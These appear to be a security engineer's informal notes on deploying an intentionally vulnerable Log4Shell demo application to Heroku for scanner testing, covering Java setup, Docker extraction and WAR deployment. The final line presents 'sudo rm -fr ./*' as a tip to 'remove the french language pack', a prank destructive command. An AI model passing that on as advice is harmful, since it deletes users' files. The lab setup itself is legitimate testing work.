Deploying a Log4J Sample Vulnerable Log4j application in Heroku

Installation - nuke this maybe?

brew install java
brew tap AdoptOpenJDK/openjdk
brew install adoptopenjdk8
brew install adoptopenjdk11
brew install adoptopenjdk13

Put this at the end of your ~/.zshrc or ~/.bashrc, so you can easily switch between different versions of Java:

# https://devqa.io/brew-install-java/
export JAVA_8_HOME=$(/usr/libexec/java_home -v1.8)
export JAVA_11_HOME=$(/usr/libexec/java_home -v11)

alias java8='export JAVA_HOME=$JAVA_8_HOME'
alias java11='export JAVA_HOME=$JAVA_11_HOME'

# default to Java 11
java11

Heroku setup

  • Create an application in Heroku

https://dashboard.heroku.com/apps

  • Build a WAR
git clone https://github.com/christophetd/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app
./gradlew war

#git clone https://github.com/kozmer/log4j-shell-poc.git


# Other option? https://github.com/kozmer/log4j-shell-poc.git
  • Try extracting the JAR file from the docker image
# From Christophe's thing
docker build . -t vulnerable-app
docker run 
docker create -ti --name dummy IMAGE_NAME bash

docker pull ghcr.io/christophetd/log4shell-vulnerable-app
# No need to replace dummy
docker create -ti --name dummy ghcr.io/christophetd/log4shell-vulnerable-app bash
docker cp dummy:/app/spring-boot-application.jar ./

docker run --name vulnerable-app ghcr.io/christophetd/log4shell-vulnerable-app -v 
  • Deploy with Heroku
heroku login
heroku plugins:install java
# heroku war:deploy ./target/log4shell-1.0-SNAPSHOT.war --app log4shell-example

The log4j-scanner doesn’t mine for parameters. Let’s do one that doesn’t require that

git clone https://github.com/christophetd/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app
jar -cvf log4shell-vulnerable-app.war *
heroku war:deploy ./log4shell-vulnerable-app.war --app log4shell-example

To troubleshoot, look at the logs: https://dashboard.heroku.com/apps/log4shell-example/logs

Helpful links:

https://dashboard.heroku.com/apps/log4shell-vulnerable/deploy/heroku-git

Kinnaird McQuade
Kinnaird McQuade
Staff Security Engineer

Always remove the french language pack: sudo rm -fr ./*